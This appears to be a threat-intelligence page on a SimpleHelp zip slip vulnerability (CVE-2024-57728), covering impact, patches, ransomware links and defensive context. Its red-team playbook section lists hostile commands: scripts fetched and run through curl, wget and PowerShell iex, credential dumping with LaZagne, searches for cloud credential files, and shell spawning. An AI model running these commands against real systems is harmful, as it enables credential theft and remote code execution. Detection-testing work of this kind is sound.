CVE-2024-57728
Overview
This vulnerability is a path traversal and arbitrary file upload flaw rooted in improper validation of zip archive contents within the SimpleHelp remote support software. The server component responsible for handling admin-uploaded zip files fails to sanitize file paths inside the archive, enabling crafted zip entries to escape intended directories. This zip slip flaw affects versions 5.5.7 and earlier, specifically the file upload processing logic in the administrative interface.
Vulnerability Description
SimpleHelp remote support software v5.5.7 and before allows admin users to upload arbitrary files anywhere on the file system by uploading a crafted zip file (i.e. zip slip). This can be exploited to execute arbitrary code on the host in the context of the SimpleHelp server user.
Impact
An attacker with administrative credentials can write arbitrary files anywhere on the server, enabling execution of malicious code with the SimpleHelp server user's privileges. This can lead to full system compromise, including unauthorized data access, persistence, and lateral movement within the network. The vulnerability requires authentication as an admin user to exploit the file upload feature, but can be combined with other vulnerabilities to bypass authentication. The business impact includes potential exposure of sensitive data and disruption of remote support operations.
Solution
Apply the patches released by SimpleHelp in January 2025 that address this vulnerability: upgrade to SimpleHelp versions 5.5.8 or later, 5.4.10 or later, or 5.3.9 or later as appropriate for your deployment. Detailed patch instructions and security advisories are available at https://simple-help.com/kb---security-vulnerabilities-01-2025#security-vulnerabilities-in-simplehelp-5-5-7-and-earlier. No workarounds are officially recommended; timely application of vendor patches is required.
EPSS vs KEV Prediction — Evolution (30 days)
Overview
Analysis generation failed
Threat Summary
Analysis generation failed
Ransomware Intelligence
Confirmed Groups
| Group | Victims | Source |
|---|---|---|
|
dragonforce
|
582 | correlation_misp |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in the SimpleHelp remote support software arises from improper handling of file uploads, specifically allowing admin users to upload arbitrary files to any location on the file system. This flaw is primarily due to the software's failure to adequately validate the contents and structure of uploaded ZIP files, leading to a scenario known as "zip slip." This occurs when a crafted ZIP file contains path traversal sequences that, when extracted, can overwrite critical files or place malicious scripts in sensitive directories. As a result, an attacker can exploit this vulnerability to execute arbitrary code on the host system, operating under the privileges of the SimpleHelp server user.
Exploitation of this vulnerability can occur through several attack vectors. An attacker with admin access can craft a malicious ZIP file that includes path traversal sequences, allowing them to upload files to restricted locations. Once the ZIP file is processed by the SimpleHelp application, the malicious payload is extracted and executed, potentially leading to full system compromise. In scenarios where the SimpleHelp server runs with elevated privileges, the consequences can be severe, enabling attackers to manipulate the underlying operating system, access sensitive data, or pivot to other systems within the network.
The real-world impact of this vulnerability is significant, particularly for organizations relying on remote support solutions. Successful exploitation can lead to unauthorized access to sensitive information, disruption of services, and potential data breaches. The business risks associated with such an incident include financial losses, reputational damage, and regulatory penalties, especially if customer data is compromised. Organizations may also face increased scrutiny from stakeholders and customers, leading to a loss of trust and confidence in their security practices.
To detect and mitigate the risks associated with this vulnerability, organizations should implement several strategies. First, it is crucial to ensure that all software, including remote support tools, is kept up to date with the latest security patches. Regular vulnerability assessments and penetration testing can help identify and remediate potential weaknesses before they can be exploited. Additionally, organizations should enforce strict access controls, limiting admin privileges to only those users who absolutely require them. Implementing file upload validation mechanisms, such as whitelisting file types and scanning uploaded files for malicious content, can further reduce the risk of exploitation.
In conclusion, the vulnerability within the SimpleHelp remote support software highlights the importance of robust file handling and security practices in software development. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves against such threats. Proactive detection and mitigation strategies will not only safeguard against this specific vulnerability but also enhance the overall security posture of the organization, ensuring that sensitive data and systems remain protected from malicious actors.
CSURFACE threat intelligence has identified a marked escalation in activity related to CVE-2024-57728, with detections rising from negligible to a notable presence across monitored environments. This vulnerability’s inclusion in the CISA KEV catalog underscores its recognized risk and mandates prioritized attention from defenders. The updated CVSS score of 7.2 reflects a high-severity classification, aligning with the observed increase in exploitation attempts. Additionally, the emergence of a significant EPSS score indicates a growing likelihood of exploitation in the wild, corroborated by our telemetry showing a sustained upward trend in related indicators. Of particular concern is the confirmed association of this vulnerability with multiple ransomware groups, including Dragonforce and Medusa, which signals an elevated threat of ransomware campaigns leveraging this flaw for initial access or lateral movement. Although no new exploit techniques have been publicly disclosed, the convergence of increased detection rates, formal recognition by CISA, and ransomware group involvement collectively elevate the threat level. Defenders should interpret these developments as a clear indication that CVE-2024-57728 is transitioning from theoretical risk to active exploitation, necessitating heightened vigilance in monitoring and response efforts.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Simple-Help | Simplehelp | All |
cpe:2.3:a:simple-help:simplehelp:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Ransomware Groups 1
Threat Feed
13 eventsSighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Mimikatz, PingCastle, SoftPerfect NetScan (582 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, AnyDesk, Atera, BITSAdmin, Cloudflared (517 known victims)
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Mimikatz, PingCastle, SoftPerfect NetScan (582 known victims)
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-57728 |
| horizon3.ai |
GitHub CVE
|
https://www.horizon3.ai/attack-research/disclosures/critical-vulnerabilities-in-simplehelp-remote-support-software/ |
| simple-help.com |
GitHub CVE
|
https://simple-help.com/kb---security-vulnerabilities-01-2025#security-vulnerabilities-in-simplehelp-5-5-7-and-earlier |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-57728 |
| microsoft.com |
NVD API
Technical Description
|
https://www.microsoft.com/en-us/security/blog/2026/04/06/storm-1175-focuses-gaze-on-vulnerable-web-facing-assets-in-high-tempo-medusa-ransomware-operations/ |
| trendmicro.com |
NVD API
Third Party Advisory
|
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-dragonforce |